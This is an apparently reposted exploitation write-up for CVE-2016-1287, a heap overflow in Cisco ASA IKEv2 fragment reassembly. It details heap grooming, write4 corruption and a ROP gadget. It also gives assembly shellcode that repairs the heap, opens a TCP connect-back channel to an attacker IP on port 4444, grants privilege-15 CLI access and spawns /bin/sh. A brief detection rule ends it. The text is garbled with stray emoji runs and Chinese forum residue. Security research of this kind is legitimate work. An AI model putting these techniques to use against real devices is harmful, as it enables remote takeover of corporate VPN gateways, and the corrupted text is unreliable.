David Barksdale, Jordan Gruskovnjak, and Alex Wheeler1. Background
Cisco has issued a fix to address CVE-2016-1287. The Cisco ASA Adaptive Security Appliance is an IP router that acts as an application-aware firewall, network antivirus, intrusion prevention system, and virtual private network (VPN) server. It is advertised as “the industry’s most deployed stateful firewall.” When deployed as a VPN, the device is accessible from the Internet and provides access to a company’s internal networks.2. Summary
The algorithm for re-assembling IKE payloads fragmented with the Cisco fragmentation protocol contains a bounds-checking flaw that allows a heap buffer to be overflowed with attacker-controlled data. A sequence of payloads with carefully chosen parameters causes a buffer of insufficient size to be allocated in the heap which is then overflowed when fragment payloads are copied into the buffer. Attackers can use this vulnerability to execute arbitrary code on affected devices. This flaw affects IKE versions 1 and 2, but this post will focus on specifics related to version 2.Background on Cisco’s IKE Fragmentation Implementation
The Cisco IKE fragmentation protocol splits large IKE payloads into fragments, each with the header illustrated in Figure 1.
Figure 1: Cisco IKE fragment header
Each fragment is sent to the recipient as an IKE packet with a payload of type 132. When a payload is fragmented afragment ID is chosen larger than any previous ID to identify the fragment’s reassembly queue. For any reassembly queue all the fragments are the same length, except for possibly the last fragment. Each fragment is assigned asequence number starting with 1. The last fragment is identified by a value of 1 in the last fragment field. The next payload field contains the payload type that was fragmented.3. Vulnerability
Each fragment triggers processing by two key functions: ikev2_add_rcv_frag() and ikev2_reassemble_pkt(). The first parses the fragment and maintains fragment reassembly queues. The second checks the queues and performs reassembly when all the fragments have arrived. The second function is called after each fragment is received and only acts when the number of fragments in the reassembly queue matches the sequence number of the fragment with the last fragment flag set.
Below is a snippet of code from ikev2_add_rcv_frag() showing the length check and the calculation for updating the reassembly queue length.
Figure 2: ikev2_add_rcv_frag() from lina version 9.2.4🧓👚🔑😛👌
While the Cisco fragment length field is 16 bits, Cisco limits queues to of half that size. The check in the code above is performed before a fragment is queued. The following are important items to note for this code snippet.
An understanding of the above issues is useful when examining the reassembly for the fragments. The code for reassembly is large, but a relevant snippet from ikev2_reassemble_pkt() is illustrated in Figure 3 for discussion.
Figure 3: ikev2_reassemble_pkt() from lina 9.2.4
The call to my_malloc() is passed the queue length plus a header size. There are several ways to attack this code. The most basic way to attack this code is to create a reassembly queue where one of the fragments has a length less than the default fragment header size of 8 bytes, which underflows the copy length during reassembly. This small value allows the length check (signed) in ikev2_add_rcv_frag() to be passed and the copy length to be larger (underflowed) than the allocated buffer size of: reassembly queue length + 8 in ikev2_reassemble_pkt().4. Exploitation
After having successfully crafted fragments with length less than 8, the corruption happens during the fragments reassembly. However, the corruption cannot be used as-is beyond a DoS due to the negative copy (access violation). Several steps are discussed below to use the vulnerability to obtain remote code execution.Crafting Small Fragments
Crafting small fragments (length < 8) can be accomplished by padding the fragment with valid information past where the fragment should end. For example, even though a fragment of length 1 should not have a size or sequence number, these fields still need valid values. Other fields that are not checked can be padded with random values.Avoiding the Negative Copy
In order to get remote code execution the negative copy should be avoided. In the interest of brevity we’ll explain the logic and exploitation of it without including the relevant disassembly. Fragments are queued by fragment ID and reassembled using sequence number. All fragments other than the last fragment should have the same size. The following pieces of program logic can be abused to send a sequence of fragments to avoid the negative copy.
Given the above, the following sequence of fragments can be sent to avoid the negative copy.
The above sequence yields the reassembly queue where fragments with sequence numbers 0 and 3 are not reassembled, but each result in -7 being added to the reassembly queue length. Fragment with sequence number 1 is the only one that will be reassembled and N – 8 bytes will be copied from the payload, thus avoiding the negative copy.Cisco Heap Layout
Some insight of the Cisco heap layout is needed in order to decide what can be achieved with the current memory corruption. The Cisco ASA heap is based on a Doug Lea malloc() implementation. The Cisco heap appends a header and a footer to the classic dlmalloc chunk. The headers and footers add extra information for memory integrity and debugging/troubleshooting purposes. An allocated chunk layout is described below.
(gdb) x/70wx 0xccedf970 – 0x28 👩✈️🧦🗝😋🤞
The first 0x28 bytes (in green) are part of the heap header, the 2 last dwords (in blue) belong to the heap footer. The relevant header’s fields from an exploitation perspective are:
A freed chunk layout is as follows:
(gdb) x/70wx 0xccedf970 – 0x28
Similarly, a freed chunk layout is described below.
The vulnerable block of size 0xd3 (size used for our exploit, which will make sense later in this post) allocated in theikev2_get_assembled_pkt() looks as follows:
(gdb) x/70wx 0xcbf3d1a8 – 0x28
With the Cisco layout in mind, let’s look at what is located behind the vulnerable chunk:
(gdb) x/70wx 0xcbf3d1a8 – 0x28
The first dword of the vulnerable chunk’s data (in red) is reserved for the total size (0xcb) of the fragment data being copied. The last 2 dwords are respectively the header magic and the chunk size of the adjacent 0x30 bytes freed chunk. With a copy of 0xd3 bytes, the fields in red will be corrupted:
(gdb) x/70wx 0xcbf3d1a8 – 0x28
In the end, the magic from the next chunk’s heap header is corrupted, and eventually 1 byte of the next chunk size field can be corrupted. This means that given a correctly crafted heap layout, it is possible to insert a chunk into a freelist reserved for bigger chunks. The attacker can then claim this chunk with another packet and completely corrupt memory overlapped by the fake bigger chunk as will be explained below.Crafting the Heap
In order to be able to achieve interesting things, the attacker has to set the heap in a predictable layout. For that, theikev2_parse_config_payload() function has been used. This function is reached when IKEv2 packets are sent with a Configuration Payload (type 47). The layout of these packets is illustrated in Figure 4.
Figure 4: IKEv2 config payload packet
The IKE v2 Configuration Payload field descriptions are as follows:
The Configuration Attributes field is of variable length and allows specifying multiple attributes. The Configuration Attributes are illustrated in Figure 5.
Figure 5: IKEv2 Configuration Attributes
The IKEv2 Configuration Attributes field descriptions are as follows:
This will allow the attacker to allocate chunks of arbitrary size with controlled content as after analysingikev2_parse_config_payload() in Figure 6.
Figure 6: ikev2_parse_config_payload() lina 9.2.4
This controlled allocation will allow de-fragmenting the heap and achieving the following heap layout below:
A Configuration Attributes List packet is sent to the router in order to de-fragment the heap, and get further allocations to be contiguous to one another. A fragment of size 0x100 bytes is then sent. Each time the IKEv2 daemon receives a packet it will allocate 0x100 bytes to handle the packet data. This means that a 0x100 bytes chunk will be allocated as below:
The fragment of 0x100 bytes will then be allocated next to it:
After the packet is processed, the first 0x100 byte block is freed since its of not in use any longer, leaving a hole between the de-fragmented heap and the 0x100 bytes attacker fragment:
The last fragment of size -7 (with effective size being 0x108 bytes) triggering the overflow is then sent. A 0x100 bytes chunk is allocated to handle the packet, retrieving the 0x100 bytes chunk that has been previously freed:
Since the actual packet data is bigger than 0x100, a chunk of size 0x300 is allocated in order to contain all the UDP fragment data, ending freeing the previously allocated 0x100 bytes chunk. The heap then looks as follows:
A 0x100 bytes hole is then located right before the attacker controlled fragment. ikev2_get_assembled_pkt() will then allocate the vulnerable chunk of 0xd3 size. A chunk of size 0xd0 (because some footer data are used to contain the extra 3 bytes) is returned. Since the heap is de-fragmented, no free chunk is available to handle the request. The 0x100 bytes free block is then split into two block of 0xd0 and 0x30, giving the following heap layout:
The vulnerable my_memcpy() call is then reached and ends up corrupting the “size” field of the adjacent 0x30 bytes free chunk. Arbitrary adjacent chunk “size” field corruption has been achieved.
The corrupted freed 0x30 bytes chunk of the previous sections now looks as follows:
0xcbf3d280: 0xe100d4d0 0x00000061 0xc9109b08 0xc800005c
Note the size field (red) is now 0x61 instead of 0x31. The heap manager will now look for the next chunk, not 0x30 bytes further, but 0x60 bytes (0x61 means 0x60 byte size + previous chunk in use bit set), ending up looking into the attacker’s fragment data. Since the fragment’s data is controlled, a fake heap chunk can be crafted. The 0x60 bytes freed chunk now encompasses a part of the attacker’s fragment chunk’s heap header. The fake heap metadata of the next chunk, just shrinks the size of the fragment to 0x100 bytes to conserve the heap integrity and allow the heap manager to locate the chunk adjacent to the fragment. The heap will then look as follows:
(gdb) x/100wx 0xcbf3d1a8 – 0x28
The copy loop in ikev2_get_assembled_pkt() is exited due to not finding fragment sequence number 2 and the vulnerable 0xd0 sized heap chunk is freed later in the same function. The allocator will look for freed chunks before and after the vulnerable chunk in order to perform forward and backward coalescing. If the “size” field of the 0x30 bytes chunk wasn’t tampered with, the allocator would have backward coalesced the 0xd0 chunk with the 0x30 bytes chunk leading to the insertion of a 0x100 bytes chunk into the freelist. However since the “size” field is set to 0x60 bytes, a fake chunk of 0x130 bytes will be inserted into the freelist. The fake 0x130 bytes chunk will encompass the beginning of the adjacent 0x100 bytes block controlled by the attacker.Getting Control
The attacker can now reallocate this block by sending a Configuration Attributes List packet with a bunch of Configuration Attributes of size 0x130. The 0x130 byte chunk will eventually be retrieved, corrupting the header of the attacker’s 0x100 bytes fragment chunk. As explained in the Cisco Heap Layout section, the heap header contains prev and next pointers of previous and next free chunk, whose integrity is not enforced because of the lack of safe-unlinking code. This means that an arbitrary write4 primitive can be achieved during the coalescing of the corrupted chunk. This write4 primitive will be triggered by the attacker at any time by sending a fragment with a different size. When this happens, ikev2_add_rcv_frag() is entered and proceeds to free fragments in the linked list. The corrupted fragment will eventually be freed, triggering the write4 memory corruption. One prerequisite for the write4 technique to work is that both prev and next pointers points to writeable data. This means it is not possible to overwrite a function pointers with an address to some .text section to bootstrap a ROP chain. Fortunately the whole memory is executable and there is no ASLR.
The targeted function pointer is the pointer used to add a fragment to the linked list, which will be called right after the write4 corruption to add the new fragment in the linked list inside ikev2_add_rcv_frag(). The execution flow can then be redirected to an arbitrary writable address in memory. The problem here is the lack of knowledge of the location of attacker’s controlled data at a specific address. To get around this problem, a 2nd write4 corruption will be used during the vulnerable chunk liberation. This is done by targeting other linked list pointers present in the heap header, which are used to keep track of allocated blocks of the same size. The 2nd write4 corruption will be used to craft a fake ROP gadget in memory. The following values were chosen as prev and next pointers for the 2nd write4 corruption: 0xc8002000 and 0xc821ff90 This means that during the 2nd write4 corruption the value 0xc821ff90 will be copied at address 0xc8002000. This address will eventually translate into useful bytecode (nop; jmp dword ptr[ecx]).
The attacker now has a gadget at a known location in writeable memory. The pointers used in the 1st write4 corruption are then set so as to overwrite the targeted function pointer with the address 0xc8002000 containing the ROP gadget. When the control flow is redirected, the program will land at address 0xc8002000 and execute the jmp [ecx] instruction. As can be seen in code snippet above, the ECX register holds a pointer to the newly allocated fragment containing data controlled by the attacker. Arbitrary code execution has been achieved.
帖子热度 1.3万 ℃
Since the Cisco router reboots if the lina process crashes, the heap has to be fixed in order to be able to get a reverse shell back to the attacker. In order to fix the memory, pointers from the context object located in a local stack variable, pointing to the option list linked list, are followed. By following the next pointer of the linked list and checking some values, it is possible to locate the 0x130 byte chunk used to perform the memory corruption. When it’s located its header is set to 0xd0 and the adjacent 0x60 size field is set back to 0x30 bytes. The following is our process continuation shellcode.
0xccc54fc1: mov DWORD PTR [edx],0x9b96790 ; fix corrupted function pointer
🖕🔥🌰✔🦦0xccc54fc7: mov eax,DWORD PTR [ebp-0x8] ; retrieve structure in stack
0xccc54fca: mov eax,DWORD PTR [eax+0x5c]
0xccc54fcd: mov eax,DWORD PTR [eax+0x4]
0xccc54fd0: mov eax,DWORD PTR [eax+0x8]
0xccc54fd3: mov eax,DWORD PTR [eax+0x4]
0xccc54fd6: mov eax,DWORD PTR [eax] ; go to the “next” linked list element
0xccc54fd8: test eax,eax
0xccc54fda: je 0xccc55017
0xccc54fdc: push eax
0xccc54fdd: mov eax,DWORD PTR [eax+0x8] ; follow some more pointers
👊🌕🌰❎🐯0xccc54fe0: mov eax,DWORD PTR [eax+0x4]
0xccc54fe3: lea ebx,[eax+0xd8] ; set ebx to the beginning of the corrupted chunk
0xccc54fe9: pop eax
0xccc54fea: cmp DWORD PTR [ebx],0xe100d4d0 ; ensure we are have the right chunk
0xccc54ff0: jne 0xccc54fd6🧢🔌🤑💪
0xccc54ff2: cmp DWORD PTR [ebx+0x4],0x31 ; Another check
0xccc54ff6: je 0xccc54fd6
0xccc54ff8: mov eax,ebx
0xccc54ffa: sub eax,0x100 ; Point eax to the beginning of the vulnerable chunk
0xccc54fff: mov DWORD PTR [eax+0x4],0x103 ; Fix heap metadata👴👗🗡😚🤛
0xccc55006: mov DWORD PTR [eax+0xc],0xd0
0xccc5500d: mov DWORD PTR [eax+0xf8],0xa11ccdef
The shellcode fixes the corrupted pointer used to take control of the execution flow. Then it retrieves a local variable which holds pointers to the linked list of Configuration Attributes. By following the linked list and enforcing specific values, the shellcode is able to locate the corrupted chunk in memory, and fix its heap metadata to prevent the process from crashing when the chunk is later freed. Then the real payload is executed which will be addressed in the next section.
🤳🏦🧊📳🐋Cisco ASA Shellcode
It’s necessary to use several functions of the lina binary to get a reverse shell or Cisco CLI. It is not possible to use a classic connect-back shellcode because the only network device available is the tap device. The lina binary is responsible for the handling of TCP, UDP, e.g connections, acting as a kind of user-land network driver. Cisco uses the “channel” terminology to handle network connections. Since the shellcodes are too big for this post only the general behaviour will be explained here.
Since the IKEv2 Daemon is actually a thread of the lina process, the shellcode starts by spawning a new thread for the Cisco CLI by calling process_create() and allows the IKEv2 daemon to continue to do its job. Then the daemon allocates a TCP channel connecting back to the attacker’s IP address/port by calling alloc_ch():
push eax ; Points to string “tcp/CONNECT/3/126.96.36.199/4444”
mov eax, 0x80707f0 ; call alloc_ch()
🦷🏝🥚™🐒The shellcode then sets the channel as responsible for the I/O on stdin/stdout/stderr:
; Set channel as in/out channel for ci/console
mov esi, 0xffffefc8
mov eax, dword ptr gs:[esi]🧑🚀💄⚒😭👂
mov dword ptr [eax + 0x98], ebx ; Points to allocated channel
Then, a structure responsible for the user privileges is allocated, and its privileges are set to 15 (maximum cisco privileges):
mov eax, 0x080F0A80 ; Initialize privileges structure given as parameter
; Retrieve struct
; Give me full privileges and a cool ‘#’ prompt
mov dword ptr [ebx + 0xc], 0x17ffffff ; Give full privileges
add ebx, 0x14
; Set “enable_15” username👩✈️🎩🔌🤩👏
mov dword ptr [ebx], 0x62616e65
mov dword ptr [ebx + 4], 0x315f656c
mov dword ptr [ebx + 0x8], 0x00000035
Finally the shellcode proceeds to call the ci_cons_shell() in order to spawn the Cisco CLI back to the attacker’s computer:
push 0x0a52c160 ; some function
mov eax, 0x080F6820 ; ci_cons_shell
Which gives the following result:
Type help or ‘?’ for a list of available commands.
ciscoasa# show running-config enable👨🦱👓🧹😒🤟
show running-config enable
enable password 8Ry2YjIyt7RRXU24 encrypted
The reverse shell is trickier to get and ironically probably not as useful as the Cisco CLI. It then enables a hidden SOCKSv5 proxy in the lina process, by calling a function which has been dubbed start_loopback_proxy(). It is now possible to use classic sockets by connecting to the local SOCKSv5 and telling it to connect-back to the attacker computer. Since the SOCKSv5 protocol is not really complicated this is easily done in assembly. The shellcode then proceeds as a classic connect-back shellcode, by dup2()ing the socket with stdin/stdout/stderr and execve()ing “/bin/sh”:
/bin/sh: can’t access tty; job control turned off
Looking for the value of the length field of a Fragment Payload (type 132) IKEv2 or IKEv1 packet allows detecting an exploitation attempt. Any length field with a value < 8 must be considered as an attempt to exploit the vulnerability. The detection also has to deal with the fact that the multiple payloads can be chained inside an IKEv2 packet, and that the Fragment Payload may not be the only/first payload of the packet.
CHANLL在论坛发帖时没有注意，被小偷偷去了 1 个 金币.